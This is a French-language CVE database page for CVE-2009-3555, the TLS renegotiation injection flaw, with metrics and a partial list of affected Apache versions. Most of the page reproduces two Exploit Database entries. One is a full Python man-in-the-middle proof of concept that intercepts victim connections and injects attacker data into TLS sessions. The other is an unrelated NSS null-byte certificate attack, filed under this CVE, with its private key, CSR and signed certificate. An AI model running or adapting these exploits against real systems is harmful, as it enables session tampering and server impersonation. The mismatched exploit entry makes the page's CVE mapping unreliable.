CVE-2009-3555
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue.
Informations du CVE
Faiblesses connexes
| Nom de la faiblesse | Source | |
|---|---|---|
| Improper Certificate Validation The product does not validate, or incorrectly validates, a certificate. |
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 5.8 | AV:N/AC:M/Au:N/C:N/I:P/A:P | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 10071
Date de publication : 2009-11-09 23h00 +00:00
Auteur : Dan Kaminsky
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/35888/info
Mozilla Network Security Services (NSS) is prone to a security-bypass vulnerability because it fails to properly validate the domain name in a signed CA certificate, allowing attackers to substitute malicious SSL certificates for trusted ones.
The NSS library is used by a number of applications, including Mozilla Firefox, Thunderbird, and SeaMonkey.
Successfully exploiting this issue allows attackers to perform man-in-the-middle attacks or impersonate trusted servers, which will aid in further attacks.
NOTE (August 6, 2009): This BID had included a similar issue in Fetchmail, but that issue is now documented in BID 35951 (Fetchmail NULL Character CA SSL Certificate Validation Security Bypass Vulnerability).
Private-Key: (1024 bit)
modulus:
00:cf:4d:17:42:00:8d:0c:41:95:31:8c:40:30:bc:
5e:42:b6:28:09:75:2f:19:61:d9:ab:4d:ec:f3:44:
c4:1c:01:95:6f:27:eb:70:07:98:4f:1e:05:d0:f3:
6c:49:45:e6:de:48:7a:59:f0:c2:93:6a:37:9c:02:
72:4f:bd:14:36:26:a1:70:97:d4:fe:4b:24:e8:cd:
29:1e:61:1a:85:b0:6f:96:06:83:10:13:d6:89:9f:
bd:07:67:f1:42:de:9b:63:67:8b:96:f9:06:ef:7c:
93:4b:6a:f9:39:31:32:7f:98:59:ef:ce:91:be:05:
ce:f0:82:33:d8:76:06:4c:9f
publicExponent: 65537 (0x10001)
privateExponent:
00:8c:4f:3b:7c:ba:ee:bc:ea:ee:d6:58:7d:61:ff:
3d:35:9e:21:3f:35:87:a9:80:67:59:e1:26:8e:09:
6f:4b:1d:6f:4d:8b:11:7a:04:49:fc:d2:ef:50:dc:
51:e0:ce:65:52:f2:6f:8d:cc:bd:86:15:90:8a:11:
c5:d9:5e:ba:fc:2b:fc:e3:a0:cd:c8:f0:9a:05:76:
06:82:07:a9:bd:14:cc:c7:7e:54:b9:32:5b:40:7a:
35:0a:26:80:d7:30:98:d6:b7:71:d5:9d:f4:0d:f2:
28:b5:a9:0c:2e:6d:78:19:86:a9:31:b0:a1:43:1c:
57:2c:78:a9:42:b2:49:d8:71
prime1:
00:ec:07:79:1d:e2:50:14:77:af:99:18:1b:14:d4:
0c:25:0c:20:26:0d:dd:c7:75:0e:08:d3:77:72:ce:
2d:57:80:9d:18:bb:60:7b:b2:62:4e:21:a1:e6:84:
96:91:31:15:cc:5b:89:5b:5a:83:07:96:51:e4:d4:
e6:3a:40:99:03
prime2:
00:e0:d7:5a:07:0e:cc:a6:17:22:f8:ec:51:b1:7b:
17:af:3a:87:7b:f1:e4:6d:40:48:28:d2:c0:9c:93:
e0:f1:8f:79:07:8f:00:e0:49:1d:0e:8c:65:41:ba:
c8:20:e2:ae:78:54:75:6b:f0:41:e5:d1:9c:2e:23:
49:79:53:35:35
exponent1:
15:17:15:db:75:bd:72:16:bf:ba:0e:4d:5d:2f:15:
66:ba:0e:a5:57:d7:d9:5a:bc:46:4d:9e:fe:c3:2d:
8a:04:14:05:81:b8:bd:54:d3:33:e8:0d:6f:6b:a9:
88:8f:ba:42:e8:6a:fd:9e:b8:d6:94:b7:fc:9a:89:
77:eb:0d:c1
exponent2:
5c:5a:38:61:63:c3:cd:88:fd:55:6f:84:12:b9:73:
be:06:f5:75:84:a3:05:f8:fc:6a:c0:3e:5b:52:26:
78:32:2d:4d:5c:80:c8:9f:5f:6f:05:5d:e6:04:b9:
85:40:76:d7:78:21:8f:07:6d:99:df:62:1e:55:62:
2d:92:6e:ed
coefficient:
00:c5:62:ea:ee:85:5c:eb:e6:07:12:58:a5:63:5a:
8f:e3:b3:df:c5:1e:cc:01:cd:87:d4:12:3f:45:8e:
a9:4c:83:51:31:5a:e5:8d:11:a1:e3:84:b8:b4:e1:
12:33:eb:2d:4c:4e:8c:49:e2:0d:50:aa:ca:38:e3:
e6:c2:29:86:17
Certificate Request:
Data:
Version: 0 (0x0)
Subject: C=US, CN=*\x00thoughtcrime.noisebridge.net, ST=California, L=San Francisco, O=Noisebridge, OU=Moxie Marlinspike Fan Club
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public Key: (1024 bit)
Modulus (1024 bit):
00:cf:4d:17:42:00:8d:0c:41:95:31:8c:40:30:bc:
5e:42:b6:28:09:75:2f:19:61:d9:ab:4d:ec:f3:44:
c4:1c:01:95:6f:27:eb:70:07:98:4f:1e:05:d0:f3:
6c:49:45:e6:de:48:7a:59:f0:c2:93:6a:37:9c:02:
72:4f:bd:14:36:26:a1:70:97:d4:fe:4b:24:e8:cd:
29:1e:61:1a:85:b0:6f:96:06:83:10:13:d6:89:9f:
bd:07:67:f1:42:de:9b:63:67:8b:96:f9:06:ef:7c:
93:4b:6a:f9:39:31:32:7f:98:59:ef:ce:91:be:05:
ce:f0:82:33:d8:76:06:4c:9f
Exponent: 65537 (0x10001)
Attributes:
a0:00
Signature Algorithm: md5WithRSAEncryption
64:e6:b2:77:45:74:c3:dc:f6:3d:e7:73:7f:0f:fb:dd:d7:30:
c3:0f:30:d5:52:2c:6b:41:ad:40:2b:4b:07:2a:de:80:69:d4:
a7:0b:6f:ed:cc:62:e7:4d:e1:fc:1e:81:0d:94:b9:c8:9b:14:
0a:10:d4:8e:f9:53:76:11:51:1d:c9:80:ca:15:e5:78:02:e1:
d1:89:95:b5:4a:3f:e0:f7:f3:35:ad:1f:7d:85:5b:8c:f5:de:
70:05:8f:4f:1d:cb:23:83:dd:63:b7:2f:1a:8c:a1:3c:67:d9:
f9:fc:63:c0:dc:bb:72:56:13:f6:3d:db:8e:d5:dc:01:9a:20:
a2:dc
-----BEGIN RSA PRIVATE KEY-----
MIICXQIBAAKBgQDPTRdCAI0MQZUxjEAwvF5CtigJdS8ZYdmrTezzRMQcAZVvJ+tw
B5hPHgXQ82xJRebeSHpZ8MKTajecAnJPvRQ2JqFwl9T+SyTozSkeYRqFsG+WBoMQ
E9aJn70HZ/FC3ptjZ4uW+QbvfJNLavk5MTJ/mFnvzpG+Bc7wgjPYdgZMnwIDAQAB
AoGBAIxPO3y67rzq7tZYfWH/PTWeIT81h6mAZ1nhJo4Jb0sdb02LEXoESfzS71Dc
UeDOZVLyb43MvYYVkIoRxdleuvwr/OOgzcjwmgV2BoIHqb0UzMd+VLkyW0B6NQom
gNcwmNa3cdWd9A3yKLWpDC5teBmGqTGwoUMcVyx4qUKySdhxAkEA7Ad5HeJQFHev
mRgbFNQMJQwgJg3dx3UOCNN3cs4tV4CdGLtge7JiTiGh5oSWkTEVzFuJW1qDB5ZR
5NTmOkCZAwJBAODXWgcOzKYXIvjsUbF7F686h3vx5G1ASCjSwJyT4PGPeQePAOBJ
HQ6MZUG6yCDirnhUdWvwQeXRnC4jSXlTNTUCQBUXFdt1vXIWv7oOTV0vFWa6DqVX
19lavEZNnv7DLYoEFAWBuL1U0zPoDW9rqYiPukLoav2euNaUt/yaiXfrDcECQFxa
OGFjw82I/VVvhBK5c74G9XWEowX4/GrAPltSJngyLU1cgMifX28FXeYEuYVAdtd4
IY8HbZnfYh5VYi2Sbu0CQQDFYuruhVzr5gcSWKVjWo/js9/FHswBzYfUEj9FjqlM
g1ExWuWNEaHjhLi04RIz6y1MToxJ4g1Qqso44+bCKYYX
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE REQUEST-----
MIIB3jCCAUcCADCBnjELMAkGA1UEBhMCVVMxJzAlBgNVBAMUHioAdGhvdWdodGNy
aW1lLm5vaXNlYnJpZGdlLm5ldDETMBEGA1UECBMKQ2FsaWZvcm5pYTEWMBQGA1UE
BxMNU2FuIEZyYW5jaXNjbzEUMBIGA1UEChMLTm9pc2VicmlkZ2UxIzAhBgNVBAsT
Gk1veGllIE1hcmxpbnNwaWtlIEZhbiBDbHViMIGfMA0GCSqGSIb3DQEBAQUAA4GN
ADCBiQKBgQDPTRdCAI0MQZUxjEAwvF5CtigJdS8ZYdmrTezzRMQcAZVvJ+twB5hP
HgXQ82xJRebeSHpZ8MKTajecAnJPvRQ2JqFwl9T+SyTozSkeYRqFsG+WBoMQE9aJ
n70HZ/FC3ptjZ4uW+QbvfJNLavk5MTJ/mFnvzpG+Bc7wgjPYdgZMnwIDAQABoAAw
DQYJKoZIhvcNAQEEBQADgYEAZOayd0V0w9z2Pedzfw/73dcwww8w1VIsa0GtQCtL
ByregGnUpwtv7cxi503h/B6BDZS5yJsUChDUjvlTdhFRHcmAyhXleALh0YmVtUo/
4PfzNa0ffYVbjPXecAWPTx3LI4PdY7cvGoyhPGfZ+fxjwNy7clYT9j3bjtXcAZog
otw=
-----END CERTIFICATE REQUEST-----
-----BEGIN CERTIFICATE-----
MIIGTjCCBbegAwIBAgIDExefMA0GCSqGSIb3DQEBBQUAMIIBEjELMAkGA1UEBhMC
RVMxEjAQBgNVBAgTCUJhcmNlbG9uYTESMBAGA1UEBxMJQmFyY2Vsb25hMSkwJwYD
VQQKEyBJUFMgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkgcy5sLjEuMCwGA1UEChQl
Z2VuZXJhbEBpcHNjYS5jb20gQy5JLkYuICBCLUI2MjIxMDY5NTEuMCwGA1UECxMl
aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEuMCwGA1UEAxMl
aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEgMB4GCSqGSIb3
DQEJARYRZ2VuZXJhbEBpcHNjYS5jb20wHhcNMDkwNzMwMDcxNDQyWhcNMTEwNzMw
MDcxNDQyWjCBnjELMAkGA1UEBhMCVVMxEzARBgNVBAgTCkNhbGlmb3JuaWExFjAU
BgNVBAcTDVNhbiBGcmFuY2lzY28xFDASBgNVBAoTC05vaXNlYnJpZGdlMSMwIQYD
VQQLExpNb3hpZSBNYXJsaW5zcGlrZSBGYW4gQ2x1YjEnMCUGA1UEAxQeKgB0aG91
Z2h0Y3JpbWUubm9pc2VicmlkZ2UubmV0MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCB
iQKBgQDPTRdCAI0MQZUxjEAwvF5CtigJdS8ZYdmrTezzRMQcAZVvJ+twB5hPHgXQ
82xJRebeSHpZ8MKTajecAnJPvRQ2JqFwl9T+SyTozSkeYRqFsG+WBoMQE9aJn70H
Z/FC3ptjZ4uW+QbvfJNLavk5MTJ/mFnvzpG+Bc7wgjPYdgZMnwIDAQABo4IDITCC
Ax0wCQYDVR0TBAIwADARBglghkgBhvhCAQEEBAMCBkAwCwYDVR0PBAQDAgP4MBMG
A1UdJQQMMAoGCCsGAQUFBwMBMB0GA1UdDgQWBBStfpIwBXE+eXWUWtE3s5JqXon2
TzAfBgNVHSMEGDAWgBQOB2DUOckbW12QeyPI0jSdSppGOTAJBgNVHREEAjAAMBwG
A1UdEgQVMBOBEWdlbmVyYWxAaXBzY2EuY29tMHIGCWCGSAGG+EIBDQRlFmNPcmdh
bml6YXRpb24gSW5mb3JtYXRpb24gTk9UIFZBTElEQVRFRC4gQ0xBU0VBMSBTZXJ2
ZXIgQ2VydGlmaWNhdGUgaXNzdWVkIGJ5IGh0dHBzOi8vd3d3Lmlwc2NhLmNvbS8w
LwYJYIZIAYb4QgECBCIWIGh0dHBzOi8vd3d3Lmlwc2NhLmNvbS9pcHNjYTIwMDIv
MEMGCWCGSAGG+EIBBAQ2FjRodHRwczovL3d3dy5pcHNjYS5jb20vaXBzY2EyMDAy
L2lwc2NhMjAwMkNMQVNFQTEuY3JsMEYGCWCGSAGG+EIBAwQ5FjdodHRwczovL3d3
dy5pcHNjYS5jb20vaXBzY2EyMDAyL3Jldm9jYXRpb25DTEFTRUExLmh0bWw/MEMG
CWCGSAGG+EIBBwQ2FjRodHRwczovL3d3dy5pcHNjYS5jb20vaXBzY2EyMDAyL3Jl
bmV3YWxDTEFTRUExLmh0bWw/MEEGCWCGSAGG+EIBCAQ0FjJodHRwczovL3d3dy5p
cHNjYS5jb20vaXBzY2EyMDAyL3BvbGljeUNMQVNFQTEuaHRtbDCBgwYDVR0fBHww
ejA5oDegNYYzaHR0cDovL3d3dy5pcHNjYS5jb20vaXBzY2EyMDAyL2lwc2NhMjAw
MkNMQVNFQTEuY3JsMD2gO6A5hjdodHRwOi8vd3d3YmFjay5pcHNjYS5jb20vaXBz
Y2EyMDAyL2lwc2NhMjAwMkNMQVNFQTEuY3JsMDIGCCsGAQUFBwEBBCYwJDAiBggr
BgEFBQcwAYYWaHR0cDovL29jc3AuaXBzY2EuY29tLzANBgkqhkiG9w0BAQUFAAOB
gQAjzXaLBu+/+RP0vQ6WjW/Pxgm4WQYhecqZ2+7ZFbsUCMJPQ8XE2uv+rIteGnRF
Zr3hYb+dVlfUnethjPhazZW+/hU4FePqmlbTtmMe+zMLThiScyC8y3EW4L4BZYcp
p1drPlZIj2RmSgPQ99oToUk5O6t+LMg1N14ajr9TpM8yNQ==
-----END CERTIFICATE-----
Exploit Database EDB-ID : 10579
Date de publication : 2009-12-20 23h00 +00:00
Auteur : RedTeam Pentesting
EDB Vérifié : Yes
#!/usr/bin/env python
######################################
# #
# RedTeam Pentesting GmbH #
# kontakt@redteam-pentesting.de #
# http://www.redteam-pentesting.de #
# #
######################################
# PoC exploit for the TLS renegotiation vulnerability (CVE-2009-3555)
# License
# -------
# CC-BY-SA http://creativecommons.org/licenses/by-sa/3.0/
# Timeline
# --------
# 2009-12-21 initial public release
# Known Issues
# ------------
# Firefox: if it fails connecting to a TLS site too often, falls back to
# issuing SSLv2 ClientHello only until browser is restarted
#
# wget: attempts SSLv2 ClientHello by default
# References
# ----------
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555
# http://www.phonefactor.com/sslgap
# http://www.extendedsubset.com/
# http://www.g-sec.lu/practicaltls.pdf
# http://tools.ietf.org/html/draft-ietf-tls-renegotiation-01
import tlslite
import tlslite.api
import tlslite.messages
import tlslite.constants
import struct
import socket
import threading
import array
import sys
import optparse
if not hasattr(threading.Thread, 'name'):
# emulate python 2.6 threading module for earlier versions
threading.current_thread = threading.currentThread
setattr(threading.Thread, 'name',
property(threading.Thread.getName, threading.Thread.setName))
def forward(sock1, sock2):
sock1.settimeout(1.0)
while True:
try:
data = sock1.recv(4096)
if not data:
return
sock2.send(data)
except socket.error, ex_error:
if ex_error[0] == 104: # Connection reset by peer
return
except socket.timeout, ex_timeout:
pass
class MessageWrapper(object):
def __init__(self, version = (3, 1), ssl2 = False):
self.contentType = tlslite.messages.ContentType.handshake
self.ssl2 = ssl2
self.client_version = version
def setType(self, type):
self.contentType = type
def addBytes(self, bytes):
self.bytes = bytes
def write(self, trial=False):
if trial:
raise Exception('Unsupported')
return array.array('B', self.bytes)
def send_record(sock, msg_type, version_major, version_minor, record):
msg = struct.pack('!BBBH', msg_type, version_major, version_minor, len(record))
if type(record) != str:
msg += record.tostring()
else:
msg += record
sock.send(msg)
def send_encapsulated(sslsock, type, messagebytes, version = (3, 1)):
msg = MessageWrapper(version)
msg.addBytes(struct.unpack('B'*len(messagebytes), messagebytes))
msg.setType(type)
for dummy in sslsock._sendMsg(msg, True):
pass
def decrypt_record(sslsock, type, recordbytes):
for result in sslsock._decryptRecord(type, array.array('B', recordbytes)):
pass
return result
def recv_record(sock):
try:
header = sock.recv(5)
if not header:
return None, None, None, None
msg_type, msg_version_major, msg_version_minor, msg_length = struct.unpack('!BBBH', header)
record = ''
while len(record) != msg_length:
record += sock.recv(msg_length - len(record))
return msg_type, msg_version_major, msg_version_minor, record
except socket.error, ex:
if ex[0] == 104: # Connection reset by peer
return
def recv_clienthello(sock):
header_bytes = []
header_bytes.append(sock.recv(1))
header_bytes[0] = struct.unpack('!B', header_bytes[0])[0]
if header_bytes[0] & 0x80:
# Version 2.0 Client "Record Layer"
header_bytes.append(sock.recv(1))
header_bytes[1] = struct.unpack('!B', header_bytes[1])[0]
msg_length = (header_bytes[0] & 0x7f) << 8 | header_bytes[1]
msg_version_major = 2
msg_version_minor = 0
msg_type = tlslite.constants.ContentType.handshake
record = sock.recv(msg_length)
else:
header = sock.recv(4)
msg_type = header_bytes[0]
msg_version_major, msg_version_minor, msg_length = struct.unpack('!BBH', header)
record = sock.recv(msg_length)
return msg_type, msg_version_major, msg_version_minor, record
def send_hello_request(sock):
sock.send("\x16" # Record Layer: Handshake Message
+"\x03\x01" # Record Layer Version: TLS 1.0
+"\x00\x04" # Record Layer Length: 4
+"\x00" # Handshake Message Type: Hello Request
+"\x00\x00\x00") # Handshake Message Length: 0
def send_protocol_version_alert(sock):
sock.send("\x15" # Record Layer: Alert"
+"\x03\x01" # Record Layer Version: TLS 1.0
+"\x00\x02" # Record Layer Length: 2
+"\x00" # Alert Message: fatal
+"\x46") # Alert Message: protocol version
def handle_victim(victim, options, mitmcount):
if options.one_shot and mitmcount != 0:
print threading.current_thread().name, '--one-shot specified and initial connection already handled, forwarding only'
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect(options.target)
print threading.current_thread().name, 'Connected to target %s:%u' % options.target
except socket.error, ex:
print threading.current_thread().name, 'Couldn\'t connect to target %s:%u' % options.target
print threading.current_thread().name, 'Error code %u, \'%s\'' % (ex[0], ex[1])
sys.exit(1)
t1 = threading.Thread(target=forward, args=(sock, victim))
t1.start()
t2 = threading.Thread(target=forward, args=(victim, sock))
t2.start()
t1.join()
sock.close()
t2.join()
victim.close()
return
# obtain initial "client hello" message
msg_type, msg_version_major, msg_version_minor, hello_msg = recv_clienthello(victim)
if msg_version_major == 2:
print threading.current_thread().name, "client sent SSLv2 client hello message, exiting thread"
return
tls_version = (msg_version_major, msg_version_minor)
type, length, version_major, version_minor, random, session_id_length = struct.unpack('!B3sBB32sB', hello_msg[:39])
resume_session = (session_id_length != 0)
if resume_session:
print threading.current_thread().name, "client attempting to resume session"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect(options.target)
print threading.current_thread().name, 'Connected to target %s:%u' % options.target
except socket.error, ex:
print threading.current_thread().name, 'Couldn\'t connect to target %s:%u' % options.target
print threading.current_thread().name, 'Error code %u, \'%s\'' % (ex[0], ex[1])
sys.exit(1)
sslsock = tlslite.api.TLSConnection(sock)
handshake_settings = tlslite.HandshakeSettings.HandshakeSettings()
handshake_settings.minVersion = tls_version
handshake_settings.maxVersion = tls_version
sslsock.handshakeClientCert(settings = handshake_settings)
# inject prefix
sslsock.write(options.inject)
print threading.current_thread().name, 'Injected %s' % repr(options.inject)
# send original "client hello" message over the encrypted channel
send_encapsulated(sslsock, 22, hello_msg, tls_version)
# now receive serveral TLS messages from the server, decrypt them, and forward
# them to the client, until the server sends "server hello done"
# these messages include "server hello", "certificate", "server key exchange",
# unless the client is trying to resume a previous session
print threading.current_thread().name, "about to receive server handshake messages"
server_handshake_done = False
while not server_handshake_done:
msg_type, msg_version_major, msg_version_minor, result = recv_record(sslsock.sock)
if result:
result = decrypt_record(sslsock, msg_type, result)
send_record(victim, msg_type, msg_version_major, msg_version_minor, result)
if result[0] == 0x0e: # server hello done - should terminate handshake
server_handshake_done = True
elif resume_session and msg_type == 0x14: # change cipher spec - probably irrelevant
server_handshake_done = True
else:
print threading.current_thread().name, 'receive from server failed, exiting thread'
return
print threading.current_thread().name, "server handshake done"
# now its the the client's turn to send some messages, e.g.
# "client key exchange" and "change cipher spec"
print threading.current_thread().name, "about to receive client handshake messages"
handshake_finished = False
while not handshake_finished:
msg_type, msg_version_major, msg_version_minor, record = recv_record(victim)
print threading.current_thread().name, msg_type
send_encapsulated(sslsock, msg_type, record, tls_version)
if msg_type == 0x14: # change cipher spec
handshake_finished = True
print threading.current_thread().name, "client handshake done"
# message after "change cipher spec" must be sent in the "clear"
msg_type, msg_version_major, msg_version_minor, record = recv_record(victim)
send_record(sslsock.sock, msg_type, msg_version_major, msg_version_minor, record)
# server should now send "change cipher spec" message, we decrypt and send that to the victim
msg_type, msg_version_major, msg_version_minor, record = recv_record(sslsock.sock)
result = decrypt_record(sslsock, msg_type, record)
send_record(victim, msg_type, msg_version_major, msg_version_minor, result)
# finalize handshake
msg_type, msg_version_major, msg_version_minor, record = recv_record(sslsock.sock)
if record:
send_record(victim, msg_type, msg_version_major, msg_version_minor, record)
else:
sslsock.sock.close()
victim.close()
del sslsock
return
# the rest is just forwarding TLS records between both parties,
# which we cannot interfere with anymore, apart from dropping server
# responses
if options.drop:
sslsock.sock.close()
del sslsock
else:
t1 = threading.Thread(target=forward, args=(sslsock.sock, victim))
t1.start()
t2 = threading.Thread(target=forward, args=(victim, sslsock.sock))
t2.start()
if not options.drop:
t1.join()
sslsock.sock.close()
t2.join()
victim.close()
if __name__ == "__main__":
parser = optparse.OptionParser()
parser.add_option('-l', '--listen', dest='listen_port', help='port to listen on', metavar='PORT', type='int', default=8443)
parser.add_option('-b', '--bind', dest='bind_address', help='address to bind to', metavar='ADDRESS', default='0.0.0.0')
parser.add_option('-t', '--target', dest='target', help='host and port to connect to', metavar='HOST:PORT' )
parser.add_option('-i', '--inject', dest='inject', help='string to inject', metavar='DATA')
parser.add_option('', '--inject-file', dest='inject_file', help='inject data from a file', metavar='FILE')
parser.add_option('', '--inject-base64', dest='inject_base64', help='string to inject, base64-encoded', metavar='DATA')
parser.add_option('-o', '--one-shot', dest='one_shot', action='store_true', help='only mitm the first connection attempt, forward all other connections')
parser.add_option('-d', '--drop-responses', dest='drop', action="store_true", default=False, help='drop server responses after renegotiating')
(options, args) = parser.parse_args()
if len([i for i in (options.inject, options.inject_file, options.inject_base64) if i]) != 1:
print 'Exactly one injection option must be specified'
sys.exit(1)
if options.inject_file:
try:
options.inject = open(options.inject_file, 'r').read()
except IOError, ex:
print ex
sys.exit(1)
if options.inject_base64:
import base64
try:
options.inject = base64.decodestring(options.inject_base64)
except base64.binascii.Error, ex:
print 'Error decoding base64 data: %s' % ex
sys.exit(1)
if not options.listen_port or \
not options.bind_address or \
not options.target or \
not options.inject:
parser.print_help()
sys.exit(1)
target = options.target.split(':')
if len(target)==2:
try:
target[1] = int(target[1])
except ValueError:
target[1] = None
if len(target)!=2 or not target[0] or not target[1]:
print 'Target \'%s\' not in format HOST:PORT' % options.target
sys.exit(1)
options.target = tuple(target)
try:
listensocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listensocket.bind((options.bind_address, options.listen_port))
print 'Listening on %s:%u' % (options.bind_address, options.listen_port)
except socket.error, ex:
print 'Couldn\'t listen on %s:%u' % (options.bind_address, options.listen_port)
print 'Error code %u, \'%s\'' % (ex[0], ex[1])
sys.exit(1)
listensocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listensocket.listen(5)
mitmcount = 0
while True:
try:
victim, victimaddr = listensocket.accept()
print 'New connection from %s:%u' % victimaddr
threading.Thread(target=handle_victim, args=(victim, options, mitmcount)).start()
mitmcount += 1
except KeyboardInterrupt, ex:
print '\nAborted by user, exiting...'
listensocket.close()
sys.exit(1)
Products Mentioned
Configuraton 0
Apache>>Http_server >> Version To (including) 2.2.14
- Apache>>Http_server >> Version - (Open CPE detail)
- Apache>>Http_server >> Version 0.8.11 (Open CPE detail)
- Apache>>Http_server >> Version 0.8.14 (Open CPE detail)
- Apache>>Http_server >> Version 1.0 (Open CPE detail)
- Apache>>Http_server >> Version 1.0.2 (Open CPE detail)
- Apache>>Http_server >> Version 1.0.3 (Open CPE detail)
- Apache>>Http_server >> Version 1.0.5 (Open CPE detail)
- Apache>>Http_server >> Version 1.1 (Open CPE detail)
- Apache>>Http_server >> Version 1.1.1 (Open CPE detail)
- Apache>>Http_server >> Version 1.2 (Open CPE detail)
- Apache>>Http_server >> Version 1.2.0 (Open CPE detail)
- Apache>>Http_server >> Version 1.2.1 (Open CPE detail)
- Apache>>Http_server >> Version 1.2.2 (Open CPE detail)
- Apache>>Http_server >> Version 1.2.4 (Open CPE detail)
- Apache>>Http_server >> Version 1.2.5 (Open CPE detail)
- Apache>>Http_server >> Version 1.2.6 (Open CPE detail)
- Apache>>Http_server >> Version 1.2.9 (Open CPE detail)
- Apache>>Http_server >> Version 1.3 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.0 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.1 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.1.1 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.2 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.3 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.4 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.5 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.6 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.7 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.8 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.9 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.10 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.11 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.12 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.13 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.14 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.15 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.16 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.17 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.18 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.19 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.20 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.22 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.23 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.24 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.25 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.26 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.27 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.28 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.29 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.30 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.31 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.32 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.33 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.34 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.35 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.36 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.37 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.38 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.39 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.41 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.42 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.65 (Open CPE detail)
- Apache>>Http_server >> Version 1.3.68 (Open CPE detail)
- Apache>>Http_server >> Version 1.4.0 (Open CPE detail)
- Apache>>Http_server >> Version 1.15.17 (Open CPE detail)
- Apache>>Http_server >> Version 1.99 (Open CPE detail)
- Apache>>Http_server >> Version 2.0 (Open CPE detail)
- Apache>>Http_server >> Version 2.0 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.0 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.1 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.2 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.3 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.4 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.5 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.6 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.7 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.8 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.9 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.10 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.11 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.12 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.13 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.14 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.15 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.16 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.17 (Open CPE detail)
